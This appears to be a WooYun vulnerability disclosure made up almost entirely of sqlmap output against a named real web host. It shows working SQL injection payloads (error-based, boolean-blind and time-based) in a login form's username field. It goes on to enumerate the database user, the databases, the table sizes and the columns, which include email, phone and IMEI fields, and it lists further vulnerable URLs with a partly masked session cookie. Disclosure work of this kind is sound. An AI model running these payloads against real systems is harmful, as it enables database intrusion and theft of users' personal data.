WooYun.org

http://bug2go.suning.com/ (POST)
formhash=e171e650&login=1&username=admin&password=admin

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: username
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: formhash=e171e650&login=1&username=admin' AND (SELECT 5063 FROM(SEL
ECT COUNT(*),CONCAT(0x71696e6371,(SELECT (CASE WHEN (5063=5063) THEN 1 ELSE 0 EN
D)),0x71776a7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
 BY x)a) AND 'PuUt'='PuUt&password=admin
---
[19:41:43] [INFO] testing MySQL
[19:41:43] [WARNING] reflective value(s) found and filtering out
[19:41:43] [INFO] confirming MySQL
[19:41:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.6.0
back-end DBMS: MySQL >= 5.0.0
[19:41:44] [INFO] fetching current user
[19:41:44] [INFO] retrieved: buguser@%
current user:    'buguser@%'
[19:41:44] [INFO] fetching current database
[19:41:44] [INFO] retrieved: bug2go
current database:    'bug2go'
[19:41:44] [INFO] testing if current user is DBA
[19:41:44] [INFO] fetching current user
current user is DBA:    False
database management system users [1]:
[*] 'buguser'@'%'
available databases [3]:
[*] bug2go
[*] information_schema
[*] test
Database: bug2go
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| bug_sync        | 51106591 |
| bug_log         | 4737376 |
| bug_hint        | 4124952 |
| bug_syncstats   | 2652126 |
| bug_attribution | 303532  |
| bug_process     | 39973   |
| bug_actdevice   | 32779   |
| bug_actrequest  | 30062   |
| bug_aprdevice   | 23295   |
| bug_actstats    | 3909    |
| bug_package     | 371     |
| bug_forumindex  | 367     |
| bug_component   | 144     |
| bug_apr         | 83      |
| bug_ufrthumb    | 75      |
| bug_index       | 21      |
| bug_user        | 14      |
+-----------------+---------+
Database: bug2go
Table: bug_sync
[23 columns]
+----------+-----------------------+
| Column   | Type                  |
+----------+-----------------------+
| size     | mediumint(9) unsigned |
| version  | varchar(50)           |
| category | char(50)              |
| cid      | tinyint(3) unsigned   |
| cover    | tinyint(3) unsigned   |
| email    | char(50)              |
| etime    | int(10) unsigned      |
| fid      | mediumint(8) unsigned |
| hasimg   | tinyint(3) unsigned   |
| hid      | int(10) unsigned      |
| hits     | tinyint(3) unsigned   |
| imei     | char(15)              |
| jobno    | char(32)              |
| lid      | bigint(20) unsigned   |
| logtime  | int(10) unsigned      |
| model    | char(32)              |
| name     | varchar(128)          |
| phone    | char(17)              |
| pid      | mediumint(8) unsigned |
| sid      | bigint(20) unsigned   |
| status   | tinyint(3) unsigned   |
| stime    | int(10) unsigned      |
| type     | char(3)               |
+----------+-----------------------+
Database: bug2go
Table: bug_log
[12 columns]
+---------+-----------------------+
| Column  | Type                  |
+---------+-----------------------+
| email   | char(50)              |
| fid     | mediumint(8) unsigned |
| hasimg  | tinyint(3) unsigned   |
| hid     | mediumint(8) unsigned |
| imei    | char(20)              |
| lid     | bigint(20) unsigned   |
| logname | char(128)             |
| logtime | int(10) unsigned      |
| model   | char(32)              |
| phone   | char(17)              |
| pid     | mediumint(8) unsigned |
| sid     | bigint(20) unsigned   |
+---------+-----------------------+

POST parameter 'username' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] N
sqlmap identified the following injection points with a total of 355 HTTP(s) req
uests:
---
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus
e (RLIKE)
    Payload: formhash=e171e650&login=1&username=admin' RLIKE (SELECT (CASE WHEN
(1774=1774) THEN 0x61646d696e ELSE 0x28 END)) AND 'yRDH'='yRDH&password=admin
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: formhash=e171e650&login=1&username=admin' AND (SELECT 7315 FROM(SEL
ECT COUNT(*),CONCAT(0x7179796c71,(SELECT (CASE WHEN (7315=7315) THEN 1 ELSE 0 EN
D)),0x71616c6c71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
 BY x)a) AND 'gwzq'='gwzq&password=admin
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: formhash=e171e650&login=1&username=admin' AND 1183=BENCHMARK(500000
0,MD5(0x6c747a7a)) AND 'vJcM'='vJcM&password=admin
---
[20:04:31] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.6.0
back-end DBMS: MySQL 5.0
[20:04:31] [INFO] fetching current user
[20:04:31] [INFO] retrieved: buguser@%
current user:    'buguser@%'
[20:04:31] [INFO] fetching current database
[20:04:31] [INFO] retrieved: bug2go
current database:    'bug2go'
[20:04:31] [INFO] testing if current user is DBA
[20:04:31] [INFO] fetching current user
current user is DBA:    False

http://bug2go.suning.com/index.php?c=ufr&model=Nexus+4&fid= (GET)

http://bug2go.suning.com/index.php?c=ufr&model=Nexus+4&fid= (GET)
Cookie: __utma=1.2022574967.1447869029.1447869029.1447869029.1; __utmz=1.1447869029.1.1.utmcsr=(direct)|utmccn=
(direct)|utmcmd=(none); 
_snma=1%7C144786903039559125%7C1447869030395%7C1447869075994%7C1447869097224%7C3%7C1; 
_ga=GA1.2.2022574967.1447869029; bug_uid=37; bug_username=mg******po; bug_logintime=1448712442; bug_salt=********